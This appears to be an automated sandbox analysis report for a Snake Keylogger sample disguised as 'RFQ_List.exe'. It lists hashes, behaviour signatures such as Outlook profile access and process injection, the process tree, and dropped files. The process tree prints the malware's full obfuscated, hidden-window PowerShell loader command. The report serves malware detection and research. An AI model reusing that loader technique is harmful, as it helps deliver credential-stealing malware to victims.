Analysis
-
max time kernel
146s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
23-10-2024 04:26
Static task
static1
Behavioral task
behavioral1
Sample
RFQ_List.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
RFQ_List.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
Maidenliness.ps1
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
Maidenliness.ps1
Resource
win10v2004-20241007-en
General
-
Target
RFQ_List.exe
-
Size
905KB
-
MD5
27393ac93e0c60c934afa5ccdfc7c529
-
SHA1
e1989ce514efd53819be62e8aa4c51975da0b3e0
-
SHA256
66f7ca7287b5118119d8e6b8d55222d7662da16c12345a6122a28b64702ae69b
-
SHA512
672583e3937f3f5f5e84843913da032d5f6d6d32c759758e37710dff340973f9f0c77fb8f5b7b176b26edddec5851aa4902deb103b277b7403ea57d88292b438
-
SSDEEP
24576:dbusrIDaWLwBhB9XE/2D6lm7Pytae6/B1GX:SX8zB9XQ2gm7OjGB1GX
Malware Config
Signatures
-
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
-
Snake Keylogger payload 2 IoCs
resource yara_rule behavioral2/memory/920-422-0x0000000001000000-0x0000000002254000-memory.dmp family_snakekeylogger behavioral2/memory/920-423-0x0000000001000000-0x0000000001026000-memory.dmp family_snakekeylogger -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 640 powershell.exe 776 powershell.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe -
Blocklisted process makes network request 9 IoCs
flow pid Process 33 920 msiexec.exe 35 920 msiexec.exe 37 920 msiexec.exe 41 920 msiexec.exe 48 920 msiexec.exe 49 3404 msiexec.exe 53 3404 msiexec.exe 57 920 msiexec.exe 60 920 msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 32 drive.google.com 33 drive.google.com 49 drive.google.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 56 checkip.dyndns.org -
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
pid Process 920 msiexec.exe 3404 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
pid Process 640 powershell.exe 776 powershell.exe 920 msiexec.exe 3404 msiexec.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File opened for modification C:\Windows\resources\Nebengeschfter.ini RFQ_List.exe File opened for modification C:\Windows\resources\0409\gildes.lak RFQ_List.exe File opened for modification C:\Windows\Fonts\thyrididae.ini RFQ_List.exe File opened for modification C:\Windows\resources\0409\diaspidine.Inq RFQ_List.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 2444 3404 WerFault.exe 99 -
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RFQ_List.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid Process 640 powershell.exe 640 powershell.exe 776 powershell.exe 776 powershell.exe 640 powershell.exe 640 powershell.exe 640 powershell.exe 640 powershell.exe 640 powershell.exe 640 powershell.exe 640 powershell.exe 776 powershell.exe 776 powershell.exe 776 powershell.exe 776 powershell.exe 776 powershell.exe 920 msiexec.exe 920 msiexec.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 640 powershell.exe 776 powershell.exe -
Suspicious use of AdjustPrivilegeToken 45 IoCs
description pid Process Token: SeDebugPrivilege 640 powershell.exe Token: SeDebugPrivilege 776 powershell.exe Token: SeIncreaseQuotaPrivilege 640 powershell.exe Token: SeSecurityPrivilege 640 powershell.exe Token: SeTakeOwnershipPrivilege 640 powershell.exe Token: SeLoadDriverPrivilege 640 powershell.exe Token: SeSystemProfilePrivilege 640 powershell.exe Token: SeSystemtimePrivilege 640 powershell.exe Token: SeProfSingleProcessPrivilege 640 powershell.exe Token: SeIncBasePriorityPrivilege 640 powershell.exe Token: SeCreatePagefilePrivilege 640 powershell.exe Token: SeBackupPrivilege 640 powershell.exe Token: SeRestorePrivilege 640 powershell.exe Token: SeShutdownPrivilege 640 powershell.exe Token: SeDebugPrivilege 640 powershell.exe Token: SeSystemEnvironmentPrivilege 640 powershell.exe Token: SeRemoteShutdownPrivilege 640 powershell.exe Token: SeUndockPrivilege 640 powershell.exe Token: SeManageVolumePrivilege 640 powershell.exe Token: 33 640 powershell.exe Token: 34 640 powershell.exe Token: 35 640 powershell.exe Token: 36 640 powershell.exe Token: SeIncreaseQuotaPrivilege 776 powershell.exe Token: SeSecurityPrivilege 776 powershell.exe Token: SeTakeOwnershipPrivilege 776 powershell.exe Token: SeLoadDriverPrivilege 776 powershell.exe Token: SeSystemProfilePrivilege 776 powershell.exe Token: SeSystemtimePrivilege 776 powershell.exe Token: SeProfSingleProcessPrivilege 776 powershell.exe Token: SeIncBasePriorityPrivilege 776 powershell.exe Token: SeCreatePagefilePrivilege 776 powershell.exe Token: SeBackupPrivilege 776 powershell.exe Token: SeRestorePrivilege 776 powershell.exe Token: SeShutdownPrivilege 776 powershell.exe Token: SeDebugPrivilege 776 powershell.exe Token: SeSystemEnvironmentPrivilege 776 powershell.exe Token: SeRemoteShutdownPrivilege 776 powershell.exe Token: SeUndockPrivilege 776 powershell.exe Token: SeManageVolumePrivilege 776 powershell.exe Token: 33 776 powershell.exe Token: 34 776 powershell.exe Token: 35 776 powershell.exe Token: 36 776 powershell.exe Token: SeDebugPrivilege 920 msiexec.exe -
Suspicious use of WriteProcessMemory 14 IoCs
description pid Process procid_target PID 1640 wrote to memory of 640 1640 RFQ_List.exe 86 PID 1640 wrote to memory of 640 1640 RFQ_List.exe 86 PID 1640 wrote to memory of 640 1640 RFQ_List.exe 86 PID 1640 wrote to memory of 776 1640 RFQ_List.exe 91 PID 1640 wrote to memory of 776 1640 RFQ_List.exe 91 PID 1640 wrote to memory of 776 1640 RFQ_List.exe 91 PID 640 wrote to memory of 920 640 powershell.exe 98 PID 640 wrote to memory of 920 640 powershell.exe 98 PID 640 wrote to memory of 920 640 powershell.exe 98 PID 640 wrote to memory of 920 640 powershell.exe 98 PID 776 wrote to memory of 3404 776 powershell.exe 99 PID 776 wrote to memory of 3404 776 powershell.exe 99 PID 776 wrote to memory of 3404 776 powershell.exe 99 PID 776 wrote to memory of 3404 776 powershell.exe 99 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\RFQ_List.exe"C:\Users\Admin\AppData\Local\Temp\RFQ_List.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1640 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Noncuriousness=Get-Content -raw 'C:\Users\Admin\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Maidenliness.Hal37';$Objektiviserende=$Noncuriousness.SubString(53938,3);.$Objektiviserende($Noncuriousness)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:640 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵
- Accesses Microsoft Outlook profiles
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:920
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Noncuriousness=Get-Content -raw 'C:\Users\Admin\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Maidenliness.Hal37';$Objektiviserende=$Noncuriousness.SubString(53938,3);.$Objektiviserende($Noncuriousness)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:776 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:3404 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3404 -s 19004⤵
- Program crash
PID:2444
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 3404 -ip 34041⤵PID:4988
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
854B
MD5e935bc5762068caf3e24a2683b1b8a88
SHA182b70eb774c0756837fe8d7acbfeec05ecbf5463
SHA256a8accfcfeb51bd73df23b91f4d89ff1a9eb7438ef5b12e8afda1a6ff1769e89d
SHA512bed4f6f5357b37662623f1f8afed1a3ebf3810630b2206a0292052a2e754af9dcfe34ee15c289e3d797a8f33330e47c14cbefbc702f74028557ace29bf855f9e
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize1KB
MD576b2de4276a82861ed2fc9622aca4532
SHA1121d53d4ccd29ff917c424c703a718f4ce811172
SHA256a5d281814ab7745a410c2de4e66244f253662f3c78fdc0d2a280632afab807e4
SHA512de2758ac45fd6d48008c9ad0f58e71d064e6284f8665cd09794f9d1a6d6c2747ed7c9be6f6a784c530b72290c0de015849e9a650e2ddd7172dda1dba79562605
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\4FA45AE1010E09657982D8D28B3BD38E_B60DAD4239F8DBB7FDA230724F9F9DFD
Filesize471B
MD5ed2bc277627fe9729bb6e14fc0ca8651
SHA145904821d33b90391b60e1c78283343b40167f79
SHA2567d3aa148aa339df14b24d65c7ec460b0bec9067dee838ef9a48a1028e393a99b
SHA512e02dd1357820ef6824580e5d9277ffcaa8540f936ae076de3dca4a61c2ab4ad0b4d1b024a171473bbd65bd8a9cf27f46167f3f38be04d56280b7348abe23440a
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DDE8B1B7E253A9758EC380BD648952AF_3459237E893F04A4596206DC25825D64
Filesize472B
MD5452e11716ea4843afe2f66561e31bed5
SHA136e2c61b5ead22352683945567e75f3bfbfc6b3c
SHA2569daa8523616103e9dd1f7ba52b95b16fcf1b6935d43488db6abf5467dceab917
SHA512b9089c671248e5a4b47742756da9837ae49da54a9cd3072624266adaaf69bcc32dabde6fcd1b7529ec6fefa3b127ec745ce425f3de22bc3cff1b922be8075d89
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199
Filesize170B
MD59224a0d544f947ec46294c488132b9a3
SHA1ec869feca2a6c19ae6d62ab9ad3247ebad4e0c15
SHA256884a0925f50819890e08baf5e10263cd427930196647349d6d5fa8677e06812a
SHA5125e89cec0508d52ee57c55d0b368d59a5b1dd273f4e3d8c17df4757f316faee0d98b344dc9481cdd21de315afbfc698e1b9fbe153c0111c135c911603999ef32e
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize410B
MD50a5fd193247c3c160d916815f61b801b
SHA10f7f2eec409dd598c2c19cd8ab9a9310033c5c3f
SHA256cbf3892ae1625329d9a69ff2e4030e877ed0adb2c035eecc80d8a9bd88a86951
SHA512c2db05c3284eeef9f6083ea6931fdbb85572ee6d397c5d5432615a3695e1443c29bc7db6f973f548fd5d46423fe1bcd32024456fcf61f34eb3918fbf92ecf6ab
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\4FA45AE1010E09657982D8D28B3BD38E_B60DAD4239F8DBB7FDA230724F9F9DFD
Filesize406B
MD52af1c4f7f2493398922103e38b6e6938
SHA19ec25310ddea7bc5d87b953da5ca53cd7a0791ba
SHA25630bb75960292d170abd7dbdfe7a213ff60dc39062defc30cac5c99671e4fe4c0
SHA512e0582a0bb39af62d032f42b327f801cd342219c53760e62ccb41cbad172a591df424101772e70c41b8d07bd8cdc16976dfe4269948594aaffe10a6677951e209
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DDE8B1B7E253A9758EC380BD648952AF_3459237E893F04A4596206DC25825D64
Filesize402B
MD5d8e25551ff67c87abe826b54caa79004
SHA13c5f26bad3185f1ccdf7894a31c5d8776d7b0557
SHA25609f49e020363cdeea02557248c72169e07f3cb3e3f43906a30f8a6633a4ca18c
SHA512e2f2a39abc1c104a4ba20bdd8ee5d2f84f4c9c64a4e617f058f2149da941115ae080e67530a7d2961db16380ef540fceac68856ddd34ab5bb46083553a415ea3
-
Filesize
821B
MD58bab97a7c73dc53f3a92ececdf91b674
SHA1a59adc96408cd84caa283280546b7d16875fea9f
SHA256819d69eccd15642d01380f6e6c1d5a5fba5ad62d25ed5b604b5cd8f96d290e32
SHA51275388ab37d3e8eb018042f37e2b2a7ad0d6dd0565b662455fa802b2635468946e925e52bd1ed647b7aa81acbdcdf21eda5810981cf0359e24868aa250cc79ecb
-
Filesize
775B
MD5fb241d07e8b3558780b49a931067493f
SHA1ed95b20fead530b5877817a20a8b629cd25f95b5
SHA25662ad1d76ff6fd74fb79518f040a9f3b8823bb2d02c59b99d0e26a1f186c6e298
SHA512a848644033ea3b2066de5847b1201ee6b766ea7405ba1adc7565c8e4dacc26513a4564b6d65850fe4bd49c84391bc5a5241b8603fa56cfb72352ac06dd621c8c
-
Filesize
53KB
MD501404e51f6442f60e478c306b1e6e52e
SHA137f234ccf5611b8309023410ceb9e76ad81f5678
SHA256d4356dd23aa2e811712132f9718786331661a1bd0d062c49cb76807b9563928b
SHA51294a9d843ae4055e2a9b412f03cba85e2d7b804ec3106f059d14ca50b15ae4acc6cd452f9461c2e21d1632d06848c969732c539aea17869b8b3a2f5ab93b891d7
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
52KB
MD5f80de07a4ce30153f8406db6a12af56e
SHA1bbe21fa2d5c1c6f2cad16333a3d095547f3426d2
SHA256510d5a55e94d189ab5afadb87a4fb0be42220646e2b2cb470511c3055c0eeba6
SHA512248a69f2a9ba266d4a571646f2235f67833edf425f3a0350becd520cc941b556bccd863ec8270de81ee48dc91bcc8f5a9bc71e51a89fd4eed529c843f1e43428
-
Filesize
320KB
MD5489a9469b8457a7dad8c174d89221366
SHA152da5892b83416d9328eec4a15b5c217ee08c1f0
SHA256b150f922d2266e7e99c0fc7e5aa565becc5671daea479980b741adc1d99b2be2
SHA512c788bf86225c25df3c4020012d38a68cf107bfeb18b7c43adf20e2969c9cf35bd2e959dd8c67337dfed2fb677ecb749e6d9634f0b5caa548f10971c4295e2473
-
Filesize
32B
MD553898e643bd3e0ca22a462325ad62da4
SHA1e0f08a75fa5219f39e49c1b9f361119905da7d02
SHA256b947991000aea669ebfeadfb12de45121d46ad3dfd02296f373f9bf8ce4f1aff
SHA512aa17b99a93a04f7bbbb92f34c15921da80e20592a39b3921f1d3cc59fae55f66196b2be4f56716846daff041253cb63d7e373b84234d451181c87f1d097fe8ca